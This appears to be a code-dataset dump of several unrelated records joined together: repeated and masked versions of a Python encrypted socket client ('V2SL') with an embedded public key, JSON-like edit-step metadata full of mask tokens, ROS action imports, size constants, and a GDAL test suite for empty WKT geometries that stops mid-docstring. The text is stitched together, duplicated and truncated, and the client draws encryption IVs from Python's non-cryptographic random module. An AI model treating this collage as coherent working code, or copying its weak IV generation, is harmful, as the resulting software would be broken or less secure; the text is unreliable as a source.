def handshake(self):
encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(
padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))
handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2
) + encrypted_key
return handshake_pkt
def _send(self, data: bytes) ->bytes:
iv = random.randbytes(16)
self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),
ciphers.modes.CFB(iv))
enc = self._aes.encryptor()
enc_data = enc.update(data) + enc.finalize()
enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data
return enc_pkt
def _recv(self) ->bytes:
if len(self._readbuf) < 4:
return None
enc_len, = struct.unpack('<I', self._readbuf[:4])
if len(self._readbuf[4:]) < enc_len:
return None
dec = self._aes.decryptor()
data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()
del self._readbuf[:4 + enc_len]
iv = data[:16]
return data[16:]
def send(self, data: bytes, split=2048) ->List[bytes]:
segments = []
if not self._handshaked:
self._handshaked = True
segments.append(self.handshake())
sentbytes = 0
while sentbytes < len(data):
segments.append(self._send(data[sentbytes:sentbytes + split]))
sentbytes += split
return segments
def recv(self, data) ->List[bytes]:
segments = []
self._readbuf += data
while (segment := self._recv()):
segments.append(segment)
return segments
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class V2SLClient:
"""
V2SL Socket Client
"""
def __init__(self):
self._aeskey = secrets.randbits(128).to_bytes(16, 'little')
self._readbuf = bytearray()
self._handshaked = False
def handshake(self):
encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(
padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))
handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2
) + encrypted_key
return handshake_pkt
def _send(self, data: bytes) ->bytes:
iv = random.randbytes(16)
self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),
ciphers.modes.CFB(iv))
enc = self._aes.encryptor()
enc_data = enc.update(data) + enc.finalize()
enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data
return enc_pkt
def _recv(self) ->bytes:
if len(self._readbuf) < 4:
return None
enc_len, = struct.unpack('<I', self._readbuf[:4])
if len(self._readbuf[4:]) < enc_len:
return None
dec = self._aes.decryptor()
data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()
del self._readbuf[:4 + enc_len]
iv = data[:16]
return data[16:]
def send(self, data: bytes, split=2048) ->List[bytes]:
segments = []
if not self._handshaked:
self._handshaked = True
segments.append(self.handshake())
sentbytes = 0
while sentbytes < len(data):
segments.append(self._send(data[sentbytes:sentbytes + split]))
sentbytes += split
return segments
def recv(self, data) ->List[bytes]:
segments = []
self._readbuf += data
while (segment := self._recv()):
segments.append(segment)
return segments
<|reserved_special_token_1|>
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
import cryptography.hazmat.primitives.ciphers as ciphers
import struct
import secrets
import random
from typing import List
LOCO_PUBLICKEY = serialization.load_pem_public_key(b"""
-----BEGIN PUBLIC KEY-----
MIIBIDANBgkqhkiG9w0BAQEFAA
OCAQ0AMIIBCAKCAQEApElgRBx+
g7sniYFW7LE8ivrwXShKTRFV8l
XNItMXbN5QSC8vJ/cTSOTS619X
v5Zx7xXJIk4EKxtWesEGbgZpEU
P2xQ+IeH9oz0JxayEMvvD1nVNA
WgpWE4pociEoArsK7qY3YwXb1C
iDHo9hojLv7djbo3cwXvlyMh4T
UrX2RjCZPlVJxk/LVjzcl9ohJL
kl3eoSrf0AE4kQ9mk3+raEhq5D
v+IDxKYX+fIytUWKmrQJusjtre
9oVUX5sBOYZ0dzez/XapusEhUW
ImmB6mciVXfRXQ8IK4IH6vfNyx
MSOTfLEhRYN2SMLzplAYFiMV53
6tLS3VmG5GJRdkpDubqPeQIBAw==
-----END PUBLIC KEY-----"""
)
class V2SLClient:
"""
V2SL Socket Client
"""
def __init__(self):
self._aeskey = secrets.randbits(128).to_bytes(16, "little")
self._readbuf = bytearray()
self._handshaked = False
def handshake(self):
encrypted_key = LOCO_PUBLICKEY.encrypt(
self._aeskey,
padding.OAEP(
padding.MGF1(hashes.SHA1()),
hashes.SHA1(), None
)
)
handshake_pkt = struct.pack("<III", len(encrypted_key), 12, 2) + encrypted_key
return handshake_pkt
def _send(self, data: bytes) -> bytes:
iv = random.randbytes(16)
self._aes = ciphers.Cipher(
ciphers.algorithms.AES(self._aeskey),
ciphers.modes.CFB(iv)
)
enc = self._aes.encryptor()
enc_data = enc.update(data) + enc.finalize()
enc_pkt = struct.pack("<I", len(enc_data)+16) + iv + enc_data
return enc_pkt
def _recv(self) -> bytes:
if len(self._readbuf) < 4:
return None
enc_len, = struct.unpack("<I", self._readbuf[:4])
if len(self._readbuf[4:]) < enc_len:
return None
dec = self._aes.decryptor()
data = dec.update(self._readbuf[4:4+enc_len]) + dec.finalize()
del self._readbuf[:4+enc_len]
iv = data[:16]
return data[16:]
def send(self, data: bytes, split=2048) -> List[bytes]:
segments = []
if not self._handshaked:
self._handshaked = True
segments.append(self.handshake())
sentbytes = 0
while sentbytes < len(data):
segments.append(self._send(data[sentbytes:sentbytes+split]))
sentbytes += split
return segments
def recv(self, data) -> List[bytes]:
segments = []
self._readbuf += data
while (segment := self._recv()):
segments.append(segment)
return segments
|
flexible
|
{
"blob_id": "db9919ab15988828d24b4430a124841f225860cc",
"index": 5764,
"step-1": "<mask token>\n\n\nclass V2SLClient:\n <mask token>\n <mask token>\n\n def handshake(self):\n encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(\n padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))\n handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2\n ) + encrypted_key\n return handshake_pkt\n\n def _send(self, data: bytes) ->bytes:\n iv = random.randbytes(16)\n self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),\n ciphers.modes.CFB(iv))\n enc = self._aes.encryptor()\n enc_data = enc.update(data) + enc.finalize()\n enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data\n return enc_pkt\n <mask token>\n\n def send(self, data: bytes, split=2048) ->List[bytes]:\n segments = []\n if not self._handshaked:\n self._handshaked = True\n segments.append(self.handshake())\n sentbytes = 0\n while sentbytes < len(data):\n segments.append(self._send(data[sentbytes:sentbytes + split]))\n sentbytes += split\n return segments\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass V2SLClient:\n <mask token>\n <mask token>\n\n def handshake(self):\n encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(\n padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))\n handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2\n ) + encrypted_key\n return handshake_pkt\n\n def _send(self, data: bytes) ->bytes:\n iv = random.randbytes(16)\n self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),\n ciphers.modes.CFB(iv))\n enc = self._aes.encryptor()\n enc_data = enc.update(data) + enc.finalize()\n enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data\n return enc_pkt\n\n def _recv(self) ->bytes:\n if len(self._readbuf) < 4:\n return None\n enc_len, = struct.unpack('<I', self._readbuf[:4])\n if len(self._readbuf[4:]) < enc_len:\n return None\n dec = self._aes.decryptor()\n data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()\n del self._readbuf[:4 + enc_len]\n iv = data[:16]\n return data[16:]\n\n def send(self, data: bytes, split=2048) ->List[bytes]:\n segments = []\n if not self._handshaked:\n self._handshaked = True\n segments.append(self.handshake())\n sentbytes = 0\n while sentbytes < len(data):\n segments.append(self._send(data[sentbytes:sentbytes + split]))\n sentbytes += split\n return segments\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass V2SLClient:\n <mask token>\n <mask token>\n\n def handshake(self):\n encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(\n padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))\n handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2\n ) + encrypted_key\n return handshake_pkt\n\n def _send(self, data: bytes) ->bytes:\n iv = random.randbytes(16)\n self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),\n ciphers.modes.CFB(iv))\n enc = self._aes.encryptor()\n enc_data = enc.update(data) + enc.finalize()\n enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data\n return enc_pkt\n\n def _recv(self) ->bytes:\n if len(self._readbuf) < 4:\n return None\n enc_len, = struct.unpack('<I', self._readbuf[:4])\n if len(self._readbuf[4:]) < enc_len:\n return None\n dec = self._aes.decryptor()\n data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()\n del self._readbuf[:4 + enc_len]\n iv = data[:16]\n return data[16:]\n\n def send(self, data: bytes, split=2048) ->List[bytes]:\n segments = []\n if not self._handshaked:\n self._handshaked = True\n segments.append(self.handshake())\n sentbytes = 0\n while sentbytes < len(data):\n segments.append(self._send(data[sentbytes:sentbytes + split]))\n sentbytes += split\n return segments\n\n def recv(self, data) ->List[bytes]:\n segments = []\n self._readbuf += data\n while (segment := self._recv()):\n segments.append(segment)\n return segments\n",
"step-4": "<mask token>\n\n\nclass V2SLClient:\n \"\"\"\n V2SL Socket Client\n \"\"\"\n\n def __init__(self):\n self._aeskey = secrets.randbits(128).to_bytes(16, 'little')\n self._readbuf = bytearray()\n self._handshaked = False\n\n def handshake(self):\n encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(\n padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))\n handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2\n ) + encrypted_key\n return handshake_pkt\n\n def _send(self, data: bytes) ->bytes:\n iv = random.randbytes(16)\n self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),\n ciphers.modes.CFB(iv))\n enc = self._aes.encryptor()\n enc_data = enc.update(data) + enc.finalize()\n enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data\n return enc_pkt\n\n def _recv(self) ->bytes:\n if len(self._readbuf) < 4:\n return None\n enc_len, = struct.unpack('<I', self._readbuf[:4])\n if len(self._readbuf[4:]) < enc_len:\n return None\n dec = self._aes.decryptor()\n data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()\n del self._readbuf[:4 + enc_len]\n iv = data[:16]\n return data[16:]\n\n def send(self, data: bytes, split=2048) ->List[bytes]:\n segments = []\n if not self._handshaked:\n self._handshaked = True\n segments.append(self.handshake())\n sentbytes = 0\n while sentbytes < len(data):\n segments.append(self._send(data[sentbytes:sentbytes + split]))\n sentbytes += split\n return segments\n\n def recv(self, data) ->List[bytes]:\n segments = []\n self._readbuf += data\n while (segment := self._recv()):\n segments.append(segment)\n return segments\n",
"step-5": "from cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\nimport cryptography.hazmat.primitives.ciphers as ciphers\nimport struct\nimport secrets\nimport random\n\nfrom typing import List\n\nLOCO_PUBLICKEY = serialization.load_pem_public_key(b\"\"\"\n-----BEGIN PUBLIC KEY-----\nMIIBIDANBgkqhkiG9w0BAQEFAA\nOCAQ0AMIIBCAKCAQEApElgRBx+\ng7sniYFW7LE8ivrwXShKTRFV8l\nXNItMXbN5QSC8vJ/cTSOTS619X\nv5Zx7xXJIk4EKxtWesEGbgZpEU\nP2xQ+IeH9oz0JxayEMvvD1nVNA\nWgpWE4pociEoArsK7qY3YwXb1C\niDHo9hojLv7djbo3cwXvlyMh4T\nUrX2RjCZPlVJxk/LVjzcl9ohJL\nkl3eoSrf0AE4kQ9mk3+raEhq5D\nv+IDxKYX+fIytUWKmrQJusjtre\n9oVUX5sBOYZ0dzez/XapusEhUW\nImmB6mciVXfRXQ8IK4IH6vfNyx\nMSOTfLEhRYN2SMLzplAYFiMV53\n6tLS3VmG5GJRdkpDubqPeQIBAw==\n-----END PUBLIC KEY-----\"\"\"\n)\n\nclass V2SLClient:\n \"\"\"\n V2SL Socket Client\n \"\"\"\n def __init__(self):\n self._aeskey = secrets.randbits(128).to_bytes(16, \"little\")\n self._readbuf = bytearray()\n self._handshaked = False\n \n def handshake(self):\n encrypted_key = LOCO_PUBLICKEY.encrypt(\n self._aeskey,\n padding.OAEP(\n padding.MGF1(hashes.SHA1()),\n hashes.SHA1(), None\n )\n )\n handshake_pkt = struct.pack(\"<III\", len(encrypted_key), 12, 2) + encrypted_key\n return handshake_pkt\n \n def _send(self, data: bytes) -> bytes:\n iv = random.randbytes(16)\n self._aes = ciphers.Cipher(\n ciphers.algorithms.AES(self._aeskey),\n ciphers.modes.CFB(iv)\n )\n enc = self._aes.encryptor()\n enc_data = enc.update(data) + enc.finalize()\n enc_pkt = struct.pack(\"<I\", len(enc_data)+16) + iv + enc_data\n return enc_pkt\n \n def _recv(self) -> bytes:\n if len(self._readbuf) < 4:\n return None\n enc_len, = struct.unpack(\"<I\", self._readbuf[:4])\n if len(self._readbuf[4:]) < enc_len:\n return None\n dec = self._aes.decryptor()\n data = dec.update(self._readbuf[4:4+enc_len]) + dec.finalize()\n del self._readbuf[:4+enc_len]\n iv = data[:16]\n return 
data[16:]\n\n def send(self, data: bytes, split=2048) -> List[bytes]:\n segments = []\n if not self._handshaked:\n self._handshaked = True\n segments.append(self.handshake())\n sentbytes = 0\n while sentbytes < len(data):\n segments.append(self._send(data[sentbytes:sentbytes+split]))\n sentbytes += split\n return segments\n\n def recv(self, data) -> List[bytes]:\n segments = []\n self._readbuf += data\n while (segment := self._recv()):\n segments.append(segment)\n return segments\n",
"step-ids": [
4,
5,
6,
8,
11
]
}
|
[
4,
5,
6,
8,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from ._sinAction import *
from ._sinActionFeedback import *
from ._sinActionGoal import *
from ._sinActionResult import *
from ._sinFeedback import *
from ._sinGoal import *
from ._sinResult import *
|
flexible
|
{
"blob_id": "c6b261a09b2982e17704f847586bbf38d27cb786",
"index": 353,
"step-1": "<mask token>\n",
"step-2": "from ._sinAction import *\nfrom ._sinActionFeedback import *\nfrom ._sinActionGoal import *\nfrom ._sinActionResult import *\nfrom ._sinFeedback import *\nfrom ._sinGoal import *\nfrom ._sinResult import *\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
G = 1000000000
M = 1000000
K = 1000
|
normal
|
{
"blob_id": "f765f54a89a98a5f61c70a37379860f170444c0a",
"index": 4069,
"step-1": "<mask token>\n",
"step-2": "G = 1000000000\nM = 1000000\nK = 1000\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
class TestWktEmpty:
def __init__(self, inString, expectedOutString):
self.inString = inString
self.expectedOutString = expectedOutString
def isEmpty(self, geom):
try:
ogr.Geometry.IsEmpty
except:
return 'skip'
if geom.IsEmpty() == False:
geom.Destroy()
gdaltest.post_reason(
'IsEmpty returning false for an empty geometry')
return 'fail'
return 'success'
def CheckIsEmpty(self):
geom = ogr.CreateGeometryFromWkt(self.inString)
wkt = geom.ExportToWkt()
if self.expectedOutString != 'POINT EMPTY':
if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(
) != wkt:
return 'fail'
if wkt == self.expectedOutString:
if self.isEmpty(geom) == 'fail':
return 'fail'
else:
return 'success'
else:
gdaltest.post_reason('WKT is wrong: ' + wkt +
'. Expected value is: ' + self.expectedOutString)
return 'fail'
<|reserved_special_token_0|>
def ogr_wktempty_test_partial_empty_geoms():
wkt = 'MULTIPOINT (1 1)'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))
wkt = 'MULTIPOINT (1 1)'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON EMPTY'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
ring = ogr.Geometry(type=ogr.wkbLinearRing)
ring.AddPoint_2D(0, 0)
ring.AddPoint_2D(10, 0)
ring.AddPoint_2D(10, 10)
ring.AddPoint_2D(0, 10)
ring.AddPoint_2D(0, 0)
geom.AddGeometry(ring)
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
geom.AddGeometry(ogr.CreateGeometryFromWkt(
'POLYGON ((100 0,100 10,110 10,100 0))'))
wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
return 'success'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('../pymod')
<|reserved_special_token_0|>
class TestWktEmpty:
def __init__(self, inString, expectedOutString):
self.inString = inString
self.expectedOutString = expectedOutString
def isEmpty(self, geom):
try:
ogr.Geometry.IsEmpty
except:
return 'skip'
if geom.IsEmpty() == False:
geom.Destroy()
gdaltest.post_reason(
'IsEmpty returning false for an empty geometry')
return 'fail'
return 'success'
def CheckIsEmpty(self):
geom = ogr.CreateGeometryFromWkt(self.inString)
wkt = geom.ExportToWkt()
if self.expectedOutString != 'POINT EMPTY':
if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(
) != wkt:
return 'fail'
if wkt == self.expectedOutString:
if self.isEmpty(geom) == 'fail':
return 'fail'
else:
return 'success'
else:
gdaltest.post_reason('WKT is wrong: ' + wkt +
'. Expected value is: ' + self.expectedOutString)
return 'fail'
<|reserved_special_token_0|>
def ogr_wktempty_test_partial_empty_geoms():
wkt = 'MULTIPOINT (1 1)'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))
wkt = 'MULTIPOINT (1 1)'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON EMPTY'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
ring = ogr.Geometry(type=ogr.wkbLinearRing)
ring.AddPoint_2D(0, 0)
ring.AddPoint_2D(10, 0)
ring.AddPoint_2D(10, 10)
ring.AddPoint_2D(0, 10)
ring.AddPoint_2D(0, 0)
geom.AddGeometry(ring)
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
geom.AddGeometry(ogr.CreateGeometryFromWkt(
'POLYGON ((100 0,100 10,110 10,100 0))'))
wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
return 'success'
<|reserved_special_token_0|>
for item in empty_wkt_list:
ut = TestWktEmpty(item[0], item[1])
gdaltest_list.append((ut.CheckIsEmpty, item[0]))
gdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)
if __name__ == '__main__':
gdaltest.setup_run('ogr_wktempty')
gdaltest.run_tests(gdaltest_list)
gdaltest.summarize()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('../pymod')
<|reserved_special_token_0|>
class TestWktEmpty:
def __init__(self, inString, expectedOutString):
self.inString = inString
self.expectedOutString = expectedOutString
def isEmpty(self, geom):
try:
ogr.Geometry.IsEmpty
except:
return 'skip'
if geom.IsEmpty() == False:
geom.Destroy()
gdaltest.post_reason(
'IsEmpty returning false for an empty geometry')
return 'fail'
return 'success'
def CheckIsEmpty(self):
geom = ogr.CreateGeometryFromWkt(self.inString)
wkt = geom.ExportToWkt()
if self.expectedOutString != 'POINT EMPTY':
if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(
) != wkt:
return 'fail'
if wkt == self.expectedOutString:
if self.isEmpty(geom) == 'fail':
return 'fail'
else:
return 'success'
else:
gdaltest.post_reason('WKT is wrong: ' + wkt +
'. Expected value is: ' + self.expectedOutString)
return 'fail'
empty_wkt_list = [('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),
('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'), (
'MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'), (
'MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'), ('POINT ( EMPTY )',
'POINT EMPTY'), ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'), (
'POLYGON ( EMPTY )', 'POLYGON EMPTY'), ('GEOMETRYCOLLECTION EMPTY',
'GEOMETRYCOLLECTION EMPTY'), ('MULTIPOLYGON EMPTY',
'MULTIPOLYGON EMPTY'), ('MULTILINESTRING EMPTY',
'MULTILINESTRING EMPTY'), ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'), (
'POINT EMPTY', 'POINT EMPTY'), ('LINESTRING EMPTY', 'LINESTRING EMPTY'),
('POLYGON EMPTY', 'POLYGON EMPTY')]
def ogr_wktempty_test_partial_empty_geoms():
    """Check that empty sub-geometries added to a container geometry are
    ignored when the container is exported to WKT.

    Returns 'success' or 'fail' (gdaltest convention).
    """

    def check(geom, expected_wkt):
        # Shared check: report and return 'fail' if the export mismatches.
        if geom.ExportToWkt() != expected_wkt:
            gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
                '. Expected value is: ' + expected_wkt)
            return 'fail'
        return 'success'

    # Multipoint with a valid point and an empty point.
    wkt = 'MULTIPOINT (1 1)'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multipoint with an empty point followed by a valid point.
    geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
    geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))
    if check(geom, 'MULTIPOINT (1 1)') != 'success':
        return 'fail'

    # Multilinestring with a valid linestring and an empty linestring.
    wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multilinestring with an empty linestring followed by a valid one.
    geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
    geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))
    if check(geom, 'MULTILINESTRING ((0 1,2 3,4 5,0 1))') != 'success':
        return 'fail'

    # Polygon with a valid external ring and an empty internal ring.
    wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Polygon with an empty external ring and a valid internal ring:
    # the polygon still exports as POLYGON EMPTY.
    wkt = 'POLYGON EMPTY'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
    ring = ogr.Geometry(type=ogr.wkbLinearRing)
    ring.AddPoint_2D(0, 0)
    ring.AddPoint_2D(10, 0)
    ring.AddPoint_2D(10, 10)
    ring.AddPoint_2D(0, 10)
    ring.AddPoint_2D(0, 0)
    geom.AddGeometry(ring)
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multipolygon with a valid polygon and an empty polygon.
    wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multipolygon with an empty polygon followed by a valid polygon.
    geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
    geom.AddGeometry(ogr.CreateGeometryFromWkt(
        'POLYGON ((100 0,100 10,110 10,100 0))'))
    if check(geom, 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))') != 'success':
        return 'fail'

    return 'success'
# Build the gdaltest test list: one CheckIsEmpty test per WKT pair, plus
# the partial-empty-geometry test.
gdaltest_list = []
for in_wkt, expected_wkt in empty_wkt_list:
    helper = TestWktEmpty(in_wkt, expected_wkt)
    gdaltest_list.append((helper.CheckIsEmpty, in_wkt))
gdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)
if __name__ == '__main__':
    gdaltest.setup_run('ogr_wktempty')
    gdaltest.run_tests(gdaltest_list)
    gdaltest.summarize()
<|reserved_special_token_1|>
import os
import sys
import string
sys.path.append('../pymod')
import gdaltest
import ogrtest
from osgeo import ogr
from osgeo import gdal
class TestWktEmpty:
    """Test helper: verify that a WKT string parses and exports back as the
    expected canonical "EMPTY" representation, and that the parsed geometry
    reports itself as empty.
    """

    def __init__(self, inString, expectedOutString):
        # WKT to feed to the parser, and the canonical WKT expected back
        # from ExportToWkt().
        self.inString = inString
        self.expectedOutString = expectedOutString

    def isEmpty(self, geom):
        """Return 'success' if *geom* reports IsEmpty(), 'fail' otherwise.

        Returns 'skip' when the bound ogr.Geometry class does not expose
